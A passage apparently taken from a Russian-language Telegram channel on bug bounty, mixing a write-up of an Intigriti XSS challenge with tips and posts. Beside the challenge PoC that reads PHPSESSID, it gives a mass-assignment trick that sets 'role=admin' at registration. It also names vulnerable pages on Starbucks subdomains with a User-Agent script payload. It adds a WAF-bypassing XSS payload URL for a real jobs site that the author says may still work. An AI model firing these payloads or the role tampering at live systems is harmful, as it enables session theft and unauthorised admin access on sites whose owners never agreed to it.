#xss #tips #tutorial

Объяснение вчерашнего челенжа от intigriti (challenge.intigriti.io/3/)
Итак, у нас дана страница

https://challenge.intigriti.io/3/

Нам необходимо вытащить PHPSESSID.
Мой PoC получился вот таким:

https://challenge.intigriti.io/3/?--><details/open/ontoggle=confirm(document.body.innerHTML.substr(document.body.innerHTML.lastIndexOf('=')+1,33))>

Но перейдя по данной ссылке вы ничего не увидите. Для того, чтоб xss сработала, страницу необходимо скачать и открыть заново.
Почему так:
после сохранения хром добавляет комментарий в начале

<!-- saved from url=(0150)https://challenge.intigriti.io/3/-%2D%3E%3Csvg/onload=alert(document.body.innerHTML.substr(document.body.innerHTML.lastIndexOf('PHPSESSID')+10,32))%3E -->

Так как данные берутся от Request-URI, спец символы такие как "> кодируются %22%3E

А из-за того что у нас исходник копируется в переменную source, а после декодируется через decodeURIComponent и записывается в body

var source = new XMLSerializer().serializeToString(document);
document.body.innerHTML = decodeURIComponent(source);

наш комментарий станет

<!-- saved from url=(0150)https://challenge.intigriti.io/3/--><svg onload="alert(document.body.innerHTML.substr(document.body.innerHTML.lastIndexOf('PHPSESSID')+10,32))">

p.s.
поеду кусок мяса на природе зажарю в честь первого сентября) пишите кому что не понятно, вечером отмечу!

xss challenge решен верно)

#tips

Небольшой совет:
при ресерчинге уязвимостей, обращайте внимание на параметр role при отправке пакета с регистрационными данными.
Порой он передается с этим пакетом и если так, то его можно изменить в свою пользу.
Он может быть к примеру таким:
role = user
role = admin
role = root
role = administrator
Пробуйте разные варианты. Иногда, регистрируя юзера можно получить админские права)

P.S.
В чате (@api_00) подкинули статейку, в который как раз человек использует совет выше. Играйте с параметрами как позволяет ваша фантазия! Статья интересна к прочтению, поэтому держите))

https://medium.com/@tarekmohamed_20773/add-new-user-with-admin-permission-and-takeover-the-organization-6318ee10154a

В старбаксе опен "редитект" на ночь глядя нашелся. Настолько на ночь глядя, что аж слово попутал)) Все по классике! Два слеша и погнали в гугл)

Мне аж латте макиато захотелось))

P.S.
эх( не налили мне латте.. осталась селф

Нус, давайте поиграемся тогда.
Вот поддомен, на котором есть хсс:
loadglobalassets.starbucks.com
Непосредственно ссылку на уязвимую страницу выложу как хинт изменением в этом же посте через 30 минут.
ХСС СЕЛФ!

Хинт:
А его и нема. Есть человек, который ее уже нашел и сделал это на поддомене выше. Я же нашел уязвимость на

https://loadglobalassets.starbucks.com/inexistent_file_name.inexistent0123450987.cfm

Поэтому можно искать как на поддомене, так и по ссылке.

Никто уже не решает, как я понял)
А селфочка была легкая. Просто добавьте

<script>alert('Subscribe to t.me/api_0)</script>

в User-agent, перехватив запрос и отправьте на исполнение.
В ответ вы увидите на странице свой алерт)

Бывает же! Прямо на основном домене приватки!)

#xss #tips

Пейлоад, который был использован выше, для воспроизведения хсс.
В связи с тем, что она оказалась дублём, то выкладываю сюда:

https://www.accentjobs.be/nl/candidates/jobs/m/%3B%20%27style=position:fixed;top:0;left:0;font-size:999px%20onmouseover%3D'alert%28%22Subscribe%20to%20t.me/api_0%22%29%27

Спрашивается и зачем я так извращался? А затем, что после того, как мы закрыли кавычкой и уголковой скобкой тег meta, любые мои теги вырезались их waf-ом. Поэтому пришлось изобретать что-то интереснее. И так, как выход из тега происходил, то воспроизвести хсс это было лишь делом обфускации и обхода waf.
Мейби и сейчас воспроизводится. Попробуйте (не в хроме и не в я.браузере)

Предлагаю вам поиграться в picoCTF. Из года в год они делают хорошие задания и все платформы оставляют открытыми, поэтому вы сейчас можете так же посмотреть, решить и проверить задания предыдущего года.
А вот на этот год:

https://2019game.picoctf.com/

Удаляю канал завтра в это же время.
Если какая-то инфа отсуда нужна, делайте бекап.
Чат (@api_0) оставлю для общения.
Всегда рад вашим вопросам в лс (@areafishing).